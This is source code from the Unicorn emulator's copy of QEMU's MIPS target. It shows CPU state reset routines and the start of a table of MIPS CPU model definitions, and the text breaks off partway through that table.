tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.mxu_cr), mxuregnames[NUMBER_OF_MXU_REGISTERS - 1]); #endif } #include "translate_init.inc.c" void cpu_mips_realize_env(CPUMIPSState *env) { env->exception_base = (int32_t)0xBFC00000; mmu_init(env, env->cpu_model); fpu_init(env, env->cpu_model); mvp_init(env, env->cpu_model); } #if 0 bool cpu_supports_cps_smp(const char *cpu_type) { const MIPSCPUClass *mcc = MIPS_CPU_CLASS(object_class_by_name(cpu_type)); return (mcc->cpu_def->CP0_Config3 & (1 << CP0C3_CMGCR)) != 0; } bool cpu_supports_isa(const char *cpu_type, uint64_t isa) { const MIPSCPUClass *mcc = MIPS_CPU_CLASS(object_class_by_name(cpu_type)); return (mcc->cpu_def->insn_flags & isa) != 0; } void cpu_set_exception_base(int vp_index, target_ulong address) { MIPSCPU *vp = MIPS_CPU(qemu_get_cpu(vp_index)); vp->env.exception_base = address; } #endif void cpu_state_reset(CPUMIPSState *env) { CPUState *cs = env_cpu(env); /* Reset registers to their default values */ env->CP0_PRid = env->cpu_model->CP0_PRid; env->CP0_Config0 = env->cpu_model->CP0_Config0; #ifdef TARGET_WORDS_BIGENDIAN env->CP0_Config0 |= (1 << CP0C0_BE); #endif env->CP0_Config1 = env->cpu_model->CP0_Config1; env->CP0_Config2 = env->cpu_model->CP0_Config2; env->CP0_Config3 = env->cpu_model->CP0_Config3; env->CP0_Config4 = env->cpu_model->CP0_Config4; env->CP0_Config4_rw_bitmask = env->cpu_model->CP0_Config4_rw_bitmask; env->CP0_Config5 = env->cpu_model->CP0_Config5; env->CP0_Config5_rw_bitmask = env->cpu_model->CP0_Config5_rw_bitmask; env->CP0_Config6 = env->cpu_model->CP0_Config6; env->CP0_Config7 = env->cpu_model->CP0_Config7; env->CP0_LLAddr_rw_bitmask = env->cpu_model->CP0_LLAddr_rw_bitmask << env->cpu_model->CP0_LLAddr_shift; env->CP0_LLAddr_shift = env->cpu_model->CP0_LLAddr_shift; env->SYNCI_Step = env->cpu_model->SYNCI_Step; env->CCRes = env->cpu_model->CCRes; env->CP0_Status_rw_bitmask = env->cpu_model->CP0_Status_rw_bitmask; env->CP0_TCStatus_rw_bitmask = env->cpu_model->CP0_TCStatus_rw_bitmask; env->CP0_SRSCtl = env->cpu_model->CP0_SRSCtl; env->current_tc = 0; env->SEGBITS = env->cpu_model->SEGBITS; env->SEGMask = (target_ulong)((1ULL << env->cpu_model->SEGBITS) - 1); #if defined(TARGET_MIPS64) if (env->cpu_model->insn_flags & ISA_MIPS3) { env->SEGMask |= 3ULL << 62; } #endif env->PABITS = env->cpu_model->PABITS; env->CP0_SRSConf0_rw_bitmask = env->cpu_model->CP0_SRSConf0_rw_bitmask; env->CP0_SRSConf0 = env->cpu_model->CP0_SRSConf0; env->CP0_SRSConf1_rw_bitmask = env->cpu_model->CP0_SRSConf1_rw_bitmask; env->CP0_SRSConf1 = env->cpu_model->CP0_SRSConf1; env->CP0_SRSConf2_rw_bitmask = env->cpu_model->CP0_SRSConf2_rw_bitmask; env->CP0_SRSConf2 = env->cpu_model->CP0_SRSConf2; env->CP0_SRSConf3_rw_bitmask = env->cpu_model->CP0_SRSConf3_rw_bitmask; env->CP0_SRSConf3 = env->cpu_model->CP0_SRSConf3; env->CP0_SRSConf4_rw_bitmask = env->cpu_model->CP0_SRSConf4_rw_bitmask; env->CP0_SRSConf4 = env->cpu_model->CP0_SRSConf4; env->CP0_PageGrain_rw_bitmask = env->cpu_model->CP0_PageGrain_rw_bitmask; env->CP0_PageGrain = env->cpu_model->CP0_PageGrain; env->CP0_EBaseWG_rw_bitmask = env->cpu_model->CP0_EBaseWG_rw_bitmask; env->active_fpu.fcr0 = env->cpu_model->CP1_fcr0; env->active_fpu.fcr31_rw_bitmask = env->cpu_model->CP1_fcr31_rw_bitmask; env->active_fpu.fcr31 = env->cpu_model->CP1_fcr31; env->msair = env->cpu_model->MSAIR; env->insn_flags = env->cpu_model->insn_flags; if (env->hflags & MIPS_HFLAG_BMASK) { /* * If the exception was raised from a delay slot, * come back to the jump. */ env->CP0_ErrorEPC = (env->active_tc.PC - (env->hflags & MIPS_HFLAG_B16 ? 2 : 4)); } else { env->CP0_ErrorEPC = env->active_tc.PC; } env->active_tc.PC = env->exception_base; env->CP0_Random = env->tlb->nb_tlb - 1; env->tlb->tlb_in_use = env->tlb->nb_tlb; env->CP0_Wired = 0; env->CP0_GlobalNumber = (cs->cpu_index & 0xFF) << CP0GN_VPId; env->CP0_EBase = (cs->cpu_index & 0x3FF); // if (mips_um_ksegs_enabled()) { if (false) { env->CP0_EBase |= 0x40000000; } else { env->CP0_EBase |= (int32_t)0x80000000; } if (env->CP0_Config3 & (1 << CP0C3_CMGCR)) { env->CP0_CMGCRBase = 0x1fbf8000 >> 4; } env->CP0_EntryHi_ASID_mask = (env->CP0_Config5 & (1 << CP0C5_MI)) ? 0x0 : (env->CP0_Config4 & (1 << CP0C4_AE)) ? 0x3ff : 0xff; env->CP0_Status = (1 << CP0St_BEV) | (1 << CP0St_ERL); /* * Vectored interrupts not implemented, timer on int 7, * no performance counters. */ env->CP0_IntCtl = 0xe0000000; { int i; for (i = 0; i < 7; i++) { env->CP0_WatchLo[i] = 0; env->CP0_WatchHi[i] = 0x80000000; } env->CP0_WatchLo[7] = 0; env->CP0_WatchHi[7] = 0; } /* Count register increments in debug mode, EJTAG version 1 */ env->CP0_Debug = (1 << CP0DB_CNT) | (0x1 << CP0DB_VER); // cpu_mips_store_count(env, 1); if (env->CP0_Config3 & (1 << CP0C3_MT)) { int i; /* Only TC0 on VPE 0 starts as active. */ for (i = 0; i < ARRAY_SIZE(env->tcs); i++) { env->tcs[i].CP0_TCBind = cs->cpu_index << CP0TCBd_CurVPE; env->tcs[i].CP0_TCHalt = 1; } env->active_tc.CP0_TCHalt = 1; cs->halted = 1; if (cs->cpu_index == 0) { /* VPE0 starts up enabled. */ env->mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP); env->CP0_VPEConf0 |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); /* TC0 starts up unhalted. */ cs->halted = 0; env->active_tc.CP0_TCHalt = 0; env->tcs[0].CP0_TCHalt = 0; /* With thread 0 active. */ env->active_tc.CP0_TCStatus = (1 << CP0TCSt_A); env->tcs[0].CP0_TCStatus = (1 << CP0TCSt_A); } } if (env->CP0_Config1 & (1 << CP0C1_FP)) { env->CP0_Status |= (1 << CP0St_CU1); } /* * Configure default legacy segmentation control. We use this regardless of * whether segmentation control is presented to the guest. */ /* KSeg3 (seg0 0xE0000000..0xFFFFFFFF) */ env->CP0_SegCtl0 = (CP0SC_AM_MK << CP0SC_AM); /* KSeg2 (seg1 0xC0000000..0xDFFFFFFF) */ env->CP0_SegCtl0 |= ((CP0SC_AM_MSK << CP0SC_AM)) << 16; /* KSeg1 (seg2 0xA0000000..0x9FFFFFFF) */ env->CP0_SegCtl1 = (0 << CP0SC_PA) | (CP0SC_AM_UK << CP0SC_AM) | (2 << CP0SC_C); /* KSeg0 (seg3 0x80000000..0x9FFFFFFF) */ env->CP0_SegCtl1 |= ((0 << CP0SC_PA) | (CP0SC_AM_UK << CP0SC_AM) | (3 << CP0SC_C)) << 16; /* USeg (seg4 0x40000000..0x7FFFFFFF) */ env->CP0_SegCtl2 = (2 << CP0SC_PA) | (CP0SC_AM_MUSK << CP0SC_AM) | (1 << CP0SC_EU) | (2 << CP0SC_C); /* USeg (seg5 0x00000000..0x3FFFFFFF) */ env->CP0_SegCtl2 |= ((0 << CP0SC_PA) | (CP0SC_AM_MUSK << CP0SC_AM) | (1 << CP0SC_EU) | (2 << CP0SC_C)) << 16; /* XKPhys (note, SegCtl2.XR = 0, so XAM won't be used) */ env->CP0_SegCtl1 |= (CP0SC_AM_UK << CP0SC1_XAM); if ((env->insn_flags & ISA_MIPS32R6) && (env->active_fpu.fcr0 & (1 << FCR0_F64))) { /* Status.FR = 0 mode in 64-bit FPU not allowed in R6 */ env->CP0_Status |= (1 << CP0St_FR); } if (env->insn_flags & ISA_MIPS32R6) { /* PTW = 1 */ env->CP0_PWSize = 0x40; /* GDI = 12 */ /* UDI = 12 */ /* MDI = 12 */ /* PRI = 12 */ /* PTEI = 2 */ env->CP0_PWField = 0x0C30C302; } else { /* GDI = 0 */ /* UDI = 0 */ /* MDI = 0 */ /* PRI = 0 */ /* PTEI = 2 */ env->CP0_PWField = 0x02; } if (env->CP0_Config3 & (1 << CP0C3_ISA) & (1 << (CP0C3_ISA + 1))) { /* microMIPS on reset when Config3.ISA is 3 */ env->hflags |= MIPS_HFLAG_M16; } /* MSA */ if (env->CP0_Config3 & (1 << CP0C3_MSAP)) { msa_reset(env); } compute_hflags(env); restore_fp_status(env); restore_pamask(env); cs->exception_index = EXCP_NONE; #if 0 if (semihosting_get_argc()) { /* UHI interface can be used to obtain argc and argv */ env->active_tc.gpr[4] = -1; } #endif } void restore_state_to_opc(CPUMIPSState *env, TranslationBlock *tb, target_ulong *data) { env->active_tc.PC = data[0]; env->hflags &= ~MIPS_HFLAG_BMASK; env->hflags |= data[1]; switch (env->hflags & MIPS_HFLAG_BMASK_BASE) { case MIPS_HFLAG_BR: break; case MIPS_HFLAG_BC: case MIPS_HFLAG_BL: case MIPS_HFLAG_B: env->btarget = data[2]; break; } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/translate_init.inc.c�������������������������������������������������0000664�0000000�0000000�00000116656�14675241067�0022364�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS emulation for qemu: CPU initialisation routines. * * Copyright (c) 2004-2005 Jocelyn Mayer * Copyright (c) 2007 Herve Poussineau * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* CPU / CPU family specific config register values. */ /* Have config1, uncached coherency */ #define MIPS_CONFIG0 \ ((1U << CP0C0_M) | (0x2 << CP0C0_K0)) /* Have config2, no coprocessor2 attached, no MDMX support attached, no performance counters, watch registers present, no code compression, EJTAG present, no FPU */ #define MIPS_CONFIG1 \ ((1U << CP0C1_M) | \ (0 << CP0C1_C2) | (0 << CP0C1_MD) | (0 << CP0C1_PC) | \ (1 << CP0C1_WR) | (0 << CP0C1_CA) | (1 << CP0C1_EP) | \ (0 << CP0C1_FP)) /* Have config3, no tertiary/secondary caches implemented */ #define MIPS_CONFIG2 \ ((1U << CP0C2_M)) /* No config4, no DSP ASE, no large physaddr (PABITS), no external interrupt controller, no vectored interrupts, no 1kb pages, no SmartMIPS ASE, no trace logic */ #define MIPS_CONFIG3 \ ((0 << CP0C3_M) | (0 << CP0C3_DSPP) | (0 << CP0C3_LPA) | \ (0 << CP0C3_VEIC) | (0 << CP0C3_VInt) | (0 << CP0C3_SP) | \ (0 << CP0C3_SM) | (0 << CP0C3_TL)) #define MIPS_CONFIG4 \ ((0 << CP0C4_M)) #define MIPS_CONFIG5 \ ((0 << CP0C5_M)) /*****************************************************************************/ /* MIPS CPU definitions */ const mips_def_t mips_defs[] = { { .name = "4Kc", .CP0_PRid = 0x00018000, .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (0 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32, .mmu_type = MMU_TYPE_R4000, }, { .name = "4Km", .CP0_PRid = 0x00018300, /* Config1 implemented, fixed mapping MMU, no virtual icache, uncached coherency. */ .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32 | ASE_MIPS16, .mmu_type = MMU_TYPE_FMT, }, { .name = "4KEcR1", .CP0_PRid = 0x00018400, .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (0 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32, .mmu_type = MMU_TYPE_R4000, }, { .name = "4KEmR1", .CP0_PRid = 0x00018500, .CP0_Config0 = MIPS_CONFIG0 | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32 | ASE_MIPS16, .mmu_type = MMU_TYPE_FMT, }, { .name = "4KEc", .CP0_PRid = 0x00019000, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (0 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "4KEm", .CP0_PRid = 0x00019100, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3, .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16, .mmu_type = MMU_TYPE_FMT, }, { .name = "24Kc", .CP0_PRid = 0x00019300, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, /* No DSP implemented. */ .CP0_Status_rw_bitmask = 0x1278FF1F, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16, .mmu_type = MMU_TYPE_R4000, }, { .name = "24KEc", .CP0_PRid = 0x00019600, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_DSPP) | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, /* we have a DSP, but no FPU */ .CP0_Status_rw_bitmask = 0x1378FF1F, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP, .mmu_type = MMU_TYPE_R4000, }, { .name = "24Kf", .CP0_PRid = 0x00019300, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, /* No DSP implemented. */ .CP0_Status_rw_bitmask = 0x3678FF1F, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16, .mmu_type = MMU_TYPE_R4000, }, { .name = "34Kf", .CP0_PRid = 0x00019500, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_VInt) | (1 << CP0C3_MT) | (1 << CP0C3_DSPP), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3778FF1F, .CP0_TCStatus_rw_bitmask = (0 << CP0TCSt_TCU3) | (0 << CP0TCSt_TCU2) | (1 << CP0TCSt_TCU1) | (1 << CP0TCSt_TCU0) | (0 << CP0TCSt_TMX) | (1 << CP0TCSt_DT) | (1 << CP0TCSt_DA) | (1 << CP0TCSt_A) | (0x3 << CP0TCSt_TKSU) | (1 << CP0TCSt_IXMT) | (0xff << CP0TCSt_TASID), .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x95 << FCR0_PRID), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .CP0_SRSCtl = (0xf << CP0SRSCtl_HSS), .CP0_SRSConf0_rw_bitmask = 0x3fffffff, .CP0_SRSConf0 = (1U << CP0SRSC0_M) | (0x3fe << CP0SRSC0_SRS3) | (0x3fe << CP0SRSC0_SRS2) | (0x3fe << CP0SRSC0_SRS1), .CP0_SRSConf1_rw_bitmask = 0x3fffffff, .CP0_SRSConf1 = (1U << CP0SRSC1_M) | (0x3fe << CP0SRSC1_SRS6) | (0x3fe << CP0SRSC1_SRS5) | (0x3fe << CP0SRSC1_SRS4), .CP0_SRSConf2_rw_bitmask = 0x3fffffff, .CP0_SRSConf2 = (1U << CP0SRSC2_M) | (0x3fe << CP0SRSC2_SRS9) | (0x3fe << CP0SRSC2_SRS8) | (0x3fe << CP0SRSC2_SRS7), .CP0_SRSConf3_rw_bitmask = 0x3fffffff, .CP0_SRSConf3 = (1U << CP0SRSC3_M) | (0x3fe << CP0SRSC3_SRS12) | (0x3fe << CP0SRSC3_SRS11) | (0x3fe << CP0SRSC3_SRS10), .CP0_SRSConf4_rw_bitmask = 0x3fffffff, .CP0_SRSConf4 = (0x3fe << CP0SRSC4_SRS15) | (0x3fe << CP0SRSC4_SRS14) | (0x3fe << CP0SRSC4_SRS13), .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_MT, .mmu_type = MMU_TYPE_R4000, }, { .name = "74Kf", .CP0_PRid = 0x00019700, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA) | (1 << CP0C1_CA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_DSP2P) | (1 << CP0C3_DSPP) | (1 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3778FF1F, .CP1_fcr0 = (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x93 << FCR0_PRID), .CP1_fcr31 = 0, .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MIPS16 | ASE_DSP | ASE_DSP_R2, .mmu_type = MMU_TYPE_R4000, }, { .name = "M14K", .CP0_PRid = 0x00019b00, /* Config1 implemented, fixed mapping MMU, no virtual icache, uncached coherency. */ .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_KU) | (0x2 << CP0C0_K23) | (0x1 << CP0C0_AR) | (MMU_TYPE_FMT << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1, .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0x2 << CP0C3_ISA) | (1 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1258FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MICROMIPS, .mmu_type = MMU_TYPE_FMT, }, { .name = "M14Kc", /* This is the TLB-based MMU core. */ .CP0_PRid = 0x00019c00, .CP0_Config0 = MIPS_CONFIG0 | (0x1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (15 << CP0C1_MMU) | (0 << CP0C1_IS) | (3 << CP0C1_IL) | (1 << CP0C1_IA) | (0 << CP0C1_DS) | (3 << CP0C1_DL) | (1 << CP0C1_DA), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (0x2 << CP0C3_ISA) | (0 << CP0C3_VInt), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 4, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x1278FF17, .SEGBITS = 32, .PABITS = 32, .insn_flags = CPU_MIPS32R2 | ASE_MICROMIPS, .mmu_type = MMU_TYPE_R4000, }, { /* FIXME: * Config3: CMGCR, PW, VZ, CTXTC, CDMM, TL * Config4: MMUExtDef * Config5: MRP * FIR(FCR0): Has2008 * */ .name = "P5600", .CP0_PRid = 0x0001A800, .CP0_Config0 = MIPS_CONFIG0 | (1 << CP0C0_MM) | (1 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (0x3F << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (1 << CP0C1_PC) | (1 << CP0C1_FP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1U << CP0C3_M) | (1 << CP0C3_MSAP) | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (1 << CP0C3_SC) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1 << CP0C3_LPA) | (1 << CP0C3_VInt), .CP0_Config4 = MIPS_CONFIG4 | (1U << CP0C4_M) | (2 << CP0C4_IE) | (0x1c << CP0C4_KScrExist), .CP0_Config4_rw_bitmask = 0, .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_EVA) | (1 << CP0C5_MVH) | (1 << CP0C5_LLB) | (1 << CP0C5_MRP), .CP0_Config5_rw_bitmask = (1 << CP0C5_K) | (1 << CP0C5_CV) | (1 << CP0C5_MSAEn) | (1 << CP0C5_UFE) | (1 << CP0C5_FRE) | (1 << CP0C5_UFR), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3C68FF1F, .CP0_PageGrain_rw_bitmask = (1U << CP0PG_RIE) | (1 << CP0PG_XIE) | (1 << CP0PG_ELPA) | (1 << CP0PG_IEC), .CP0_EBaseWG_rw_bitmask = (1 << CP0EBase_WG), .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_UFRP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x03 << FCR0_PRID), .CP1_fcr31 = (1 << FCR31_ABS2008) | (1 << FCR31_NAN2008), .CP1_fcr31_rw_bitmask = 0xFF83FFFF, .SEGBITS = 32, .PABITS = 40, .insn_flags = CPU_MIPS32R5 | ASE_MSA, .mmu_type = MMU_TYPE_R4000, }, { /* A generic CPU supporting MIPS32 Release 6 ISA. FIXME: Support IEEE 754-2008 FP. Eventually this should be replaced by a real CPU model. */ .name = "mips32r6-generic", .CP0_PRid = 0x00010000, .CP0_Config0 = MIPS_CONFIG0 | (0x2 << CP0C0_AR) | (MMU_TYPE_R4000 << CP0C0_MT), .CP0_Config1 = MIPS_CONFIG1 | (1 << CP0C1_FP) | (31 << CP0C1_MMU) | (2 << CP0C1_IS) | (4 << CP0C1_IL) | (3 << CP0C1_IA) | (2 << CP0C1_DS) | (4 << CP0C1_DL) | (3 << CP0C1_DA) | (0 << CP0C1_PC) | (1 << CP0C1_WR) | (1 << CP0C1_EP), .CP0_Config2 = MIPS_CONFIG2, .CP0_Config3 = MIPS_CONFIG3 | (1 << CP0C3_BP) | (1 << CP0C3_BI) | (2 << CP0C3_ISA) | (1 << CP0C3_ULRI) | (1 << CP0C3_RXI) | (1U << CP0C3_M), .CP0_Config4 = MIPS_CONFIG4 | (0xfc << CP0C4_KScrExist) | (3 << CP0C4_IE) | (1U << CP0C4_M), .CP0_Config5 = MIPS_CONFIG5 | (1 << CP0C5_XNP) | (1 << CP0C5_LLB), .CP0_Config5_rw_bitmask = (1 << CP0C5_SBRI) | (1 << CP0C5_FRE) | (1 << CP0C5_UFE), .CP0_LLAddr_rw_bitmask = 0, .CP0_LLAddr_shift = 0, .SYNCI_Step = 32, .CCRes = 2, .CP0_Status_rw_bitmask = 0x3058FF1F, .CP0_PageGrain = (1 << CP0PG_IEC) | (1 << CP0PG_XIE) | (1U << CP0PG_RIE), .CP0_PageGrain_rw_bitmask = 0, .CP1_fcr0 = (1 << FCR0_FREP) | (1 << FCR0_HAS2008) | (1 << FCR0_F64) | (1 << FCR0_L) | (1 << FCR0_W) | (1 << FCR0_D) | (1 << FCR0_S) | (0x00 << FCR0_PRID) | (0x0 << FCR0_REV), .CP1_fcr31 = (1 << 